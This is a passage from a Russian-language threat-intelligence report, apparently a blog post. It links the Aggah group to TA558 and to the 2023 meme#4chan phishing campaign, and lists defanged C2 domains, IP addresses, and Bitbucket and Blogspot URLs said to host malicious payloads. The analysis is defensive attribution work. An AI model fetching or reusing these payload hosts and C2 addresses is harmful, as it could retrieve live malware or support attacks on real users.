\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0440\u0430\u0437\u0434\u0435\u043b\u043e\u0432 \u043c\u044b \u043f\u043e\u043a\u0430\u0436\u0435\u043c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0441\u0432\u044f\u0437\u044c \u043c\u0435\u0436\u0434\u0443 Aggah \u0438 Crypters And Tools, \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043d\u0430 \u044d\u0442\u043e\u043c \u0444\u0430\u043a\u0442\u0435.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/937\/7ae\/13d\/9377ae13dcd2b18106b295e31dbc461e.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 9. \u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f ManaTools\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 9. \u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f ManaTools\" width=\"593\" height=\"402\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/937\/7ae\/13d\/9377ae13dcd2b18106b295e31dbc461e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/937\/7ae\/13d\/9377ae13dcd2b18106b295e31dbc461e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 9. \u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f ManaTools<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Aggah \u0432 2019 \u0433\u043e\u0434\u0443:<\/p>\n<ul>\n<li>\n<p>mastermana1.serveirc[.]com<\/p>\n<\/li>\n<li>\n<p>mastermana2.serveirc[.]com<\/p>\n<\/li>\n<li>\n<p>mastermana3.serveirc[.]com<\/p>\n<\/li>\n<li>\n<p>mastermana4.serveirc[.]com<\/p>\n<\/li>\n<li>\n<p>mastermana5.serveirc[.]com<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3fd\/79d\/66c\/3fd79d66c559bb70a27a4b1f99fd18a0.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 10. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 10. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah\" width=\"895\" height=\"342\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/3fd\/79d\/66c\/3fd79d66c559bb70a27a4b1f99fd18a0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3fd\/79d\/66c\/3fd79d66c559bb70a27a4b1f99fd18a0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 10. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah<\/figcaption><\/div>\n<\/figure>\n<p>\u0417\u0430 \u043f\u0435\u0440\u0438\u043e\u0434 2020-2022 \u0433\u043e\u0434\u0430 \u043c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 TA558 \u0438 Aggah:<\/p>\n<ul>\n<li>\n<p>\u0421\u0445\u043e\u0436\u0430\u044f \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0430\u0442\u0430\u043a: \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430 \u0438 \u0417\u0430\u043f\u0430\u0434\u043d\u0430\u044f \u0415\u0432\u0440\u043e\u043f\u0430; \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u043d\u0430\u0431\u043e\u0440 \u0412\u041f\u041e, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u043e\u0431\u0435 \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 Remcos RAT, RevengeRAT \u0438 AzoRult.<\/p>\n<\/li>\n<li>\n<p>\u0412 2021 \u0433\u043e\u0434\u0443 \u0430\u0434\u0440\u0435\u0441 3.218.4.249 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043e\u0431\u0435\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0431\u0435 \u0433\u0440\u0443\u043f\u043f\u044b \u0432 \u0441\u0432\u043e\u0438\u0445 \u0434\u043e\u043c\u0435\u043d\u0430\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0430\u0431\u0431\u0440\u0435\u0432\u0438\u0430\u0442\u0443\u0440\u0443 C.D.T:<\/p>\n<ul>\n<li>\n<p>warzonecdt[.]duckdns[.]org (\u0422\u0410558, \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a:<a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/reservations-requested-ta558-targets-hospitality-and-travel\"> Proofpoint<\/a>)<\/p>\n<\/li>\n<li>\n<p>ccnewcdt[.]duckdns[.]org (Aggah, \u043e\u0434\u0438\u043d \u0438\u0437 \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u043b\u0441\u044f \u0432 192.154.226[.]47, \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a:<a href=\"https:\/\/www.team-cymru.com\/post\/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor\"> Team Cymru<\/a>)<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041e\u0431\u0449\u0438\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0430 \u0432 \u043c\u0430\u043a\u0440\u043e\u0441\u0430\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432.<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b07\/22e\/b77\/b0722eb774aaf141ae2091e16104fea2.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 11. \u041a\u043e\u0434 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 11. \u041a\u043e\u0434 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)\" width=\"1800\" height=\"307\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b07\/22e\/b77\/b0722eb774aaf141ae2091e16104fea2.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b07\/22e\/b77\/b0722eb774aaf141ae2091e16104fea2.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 11. \u041a\u043e\u0434 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d93\/b1b\/01b\/d93b1b01b8330fa5c9a61bcfa360dfbe.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 12. \u0410\u0432\u0442\u043e\u0440\u044b \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0445 OLE-\u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 12. \u0410\u0432\u0442\u043e\u0440\u044b \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0445 OLE-\u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)\" width=\"1212\" height=\"172\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d93\/b1b\/01b\/d93b1b01b8330fa5c9a61bcfa360dfbe.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d93\/b1b\/01b\/d93b1b01b8330fa5c9a61bcfa360dfbe.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 12. \u0410\u0432\u0442\u043e\u0440\u044b \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0445 OLE-\u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 TA558 (\u0441\u043f\u0440\u0430\u0432\u0430) \u0438 Aggah (\u0441\u043b\u0435\u0432\u0430)<\/figcaption><\/div>\n<\/figure>\n<p><a class=\"anchor\" name=\"6.2\" id=\"6.2\"><\/a><\/p>\n<h3>6.2 \u0410\u0442\u0430\u043a\u0438 2023-2025 \u0433\u043e\u0434\u043e\u0432<\/h3>\n<p>\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c \u043e\u0442\u0447\u0435\u0442\u0430\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c Aggah \u043d\u0435 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u043b\u0430\u0441\u044c \u0432 \u043a\u043e\u043d\u0446\u0435 2022 \u0433\u043e\u0434\u0430, \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0431\u044b\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430 \u0438 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c.<\/p>\n<p>\u0412 \u0445\u043e\u0434\u0435 \u043f\u043e\u0438\u0441\u043a\u0430 \u043d\u043e\u0432\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u0444\u0430\u0439\u043b\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e \u0441\u0442\u0438\u043b\u044e \u043a\u043e\u0434\u0430 \u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u043c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0430\u043c \u043d\u0430\u043f\u043e\u043c\u043d\u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 Aggah. \u0414\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e, \u0447\u0442\u043e \u043e\u043d\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0435\u0439 meme#4chan, \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0439 \u0432<a href=\"https:\/\/www.securonix.com\/blog\/securonix-threat-labs-security-meme4chan-advisory\/\"> \u043e\u0442\u0447\u0435\u0442\u0435<\/a> Securonix \u0432 2023 \u0433\u043e\u0434\u0443. \u0425\u043e\u0442\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 \u044d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0431\u044b\u043b\u0430 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043a \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430\u043c\u0438 \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0437\u0430 \u043d\u0435\u0439 \u0441\u0442\u043e\u044f\u043b \u0438\u043c\u0435\u043d\u043d\u043e Aggah.<\/p>\n<p>\u041f\u0440\u0438 \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0438 \u0430\u0442\u0430\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u043e\u0441\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432, \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0445 \u0434\u043b\u044f \u043f\u0440\u043e\u0448\u043b\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 Aggah:<\/p>\n<ul>\n<li>\n<p>\u0422\u0435\u043c\u0430\u0442\u0438\u043a\u0430 \u043f\u0438\u0441\u0435\u043c \u2013 \u0433\u043e\u0441\u0442\u0438\u043d\u0438\u0447\u043d\u044b\u0439 \u0431\u0438\u0437\u043d\u0435\u0441 \u0438 \u0442\u0443\u0440\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0444\u0435\u0440\u0430. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u044b \u0432 \u0444\u0438\u0448\u0438\u043d\u0433\u0435, Aggah \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0435\u0435 \u0440\u0430\u043d\u0435\u0435. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u043b\u0438\u0441\u044c \u043a\u0430\u043a \u043d\u0430 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u043c, \u0442\u0430\u043a \u0438 \u043d\u0430 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u043e\u043c (\u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u0430\u0442\u0430\u043a\u0430\u043c 2019 \u0433\u043e\u0434\u0430).<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 serverless-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b: blogspot, mediafire, usrfiles.<\/p>\n<\/li>\n<li>\n<p>\u0421\u0442\u0438\u043b\u044c \u043a\u043e\u0434\u0430: \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043a\u043e\u0434, \u043f\u043e\u0445\u043e\u0436\u0435, \u043f\u0438\u0441\u0430\u043b\u0441\u044f \u0432\u0440\u0443\u0447\u043d\u0443\u044e, \u0441 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c\u0438, \u043f\u043e\u0440\u043e\u0439 \u0438\u0440\u043e\u043d\u0438\u0447\u043d\u044b\u043c\u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f\u043c\u0438 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u043b\u043e\u0432 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u0443\u0440\u0434\u0443. \u042d\u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u0432\u0430\u0436\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u0432\u044b\u0448\u0435 \u043c\u044b \u0443\u0436\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0435 \u043f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0441\u043a\u043e\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u044b Aggah.<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0441\u043e\u0431\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u043e\u0434\u0438\u043d \u0438\u0437 powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $ALLSAVEBACKUP, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 Blogspot-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 backuphotelall.blogspot[.]com, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0439 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0442\u044c\u0441\u044f \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b8f\/bb2\/59a\/b8fbb259ac03aee3ba182e0e6c448500.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 13. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 13. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)\" width=\"1430\" height=\"855\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b8f\/bb2\/59a\/b8fbb259ac03aee3ba182e0e6c448500.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b8f\/bb2\/59a\/b8fbb259ac03aee3ba182e0e6c448500.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 13. \u0427\u0430\u0441\u0442\u044c powershell-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)<\/figcaption><\/div>\n<\/figure>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/631\/bef\/6ab\/631bef6abfd58ba260d8b4826ac4ffb0.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 14. \u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 14. \u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)\" width=\"450\" height=\"67\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/631\/bef\/6ab\/631bef6abfd58ba260d8b4826ac4ffb0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/631\/bef\/6ab\/631bef6abfd58ba260d8b4826ac4ffb0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 14. \u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Securonix)<\/figcaption><\/div>\n<\/figure>\n<p>\u042d\u0442\u043e\u0442 Blogspot \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043d\u0430\u0439\u0442\u0438 \u0438 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 Blogspot-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u0445 Bitbucket. \u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u044b\u043b all.txt, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u043f\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u0441\u044b\u043b\u043a\u0430\u043c:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><a href=\"https:\/\/bitbucket%5B.%5Dorg\/!api\/2.0\/snippets\/nikkerkhan\/5qkMXX\/c193c8cd66ad1405f4a0ebc7293d71d0f287eb98\/files\/all.txt\">https:\/\/bitbucket[.]org\/!api\/2.0\/snippets\/nikkerkhan\/5qkMXX\/c193c8cd66ad1405f4a0ebc7293d71d0f287eb98\/files\/all.txt<\/a><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">https:\/\/backuphotelall.blogspot[.]com\/atom.xml<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">https:\/\/otherbusinesssep23.blogspot[.]com\/atom.xml<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">https:\/\/backupalllogsmay23.blogspot[.]com\/atom.xml<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">https:\/\/hotelbackuppowaug.blogspot[.]com\/atom.xml<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">https:\/\/otherbizzunus.blogspot[.]com\/atom.xml<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u041f\u043e \u043d\u0438\u043c \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u0441\u043b\u0435 meme#4chan \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438. \u041a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 hotelbackuppowaug.blogspot[.]com \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0444\u0430\u0439\u043b\u0435 